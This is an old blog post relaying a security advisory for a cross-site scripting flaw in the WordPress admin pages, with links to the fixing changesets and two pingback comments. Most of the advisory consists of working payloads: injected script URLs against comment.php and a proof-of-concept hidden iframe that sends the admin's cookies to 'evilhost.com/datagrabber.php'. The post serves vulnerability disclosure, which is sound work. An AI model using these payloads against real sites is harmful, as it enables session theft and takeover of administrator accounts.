A vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.
Here are some examples of arbitrary code execution:
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Here is a proof-of-concept code to steal the admin cookies:
<iframe width="0" height="0" src="http://somesite.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27"></iframe>
Solution:
http://trac.wordpress.org/changeset/4951
http://trac.wordpress.org/changeset/4952
Original advisory at seclists.org








2 responses so far ↓
1 TechnoBeta Blog » Zeroday Exploit found for WordPress 2.1.1 // Feb 28, 2007 at 3:19 pm
[...] [via Luis Cosio] Original Source Written by Santosh on Feb 28 WordPress Written by Santosh on Feb 28 [...]
2 Smemoratezze dal sottosuolo » Blog Archive » E questo succede a casa Wordpress // Mar 3, 2007 at 1:20 pm
[...] Una panoramica del bug fraudolento e suoi possibili exploit è stata fatta dal quasi diciannovenne imprenditore (…) Luis Cosio, qui. [...]
Leave a Comment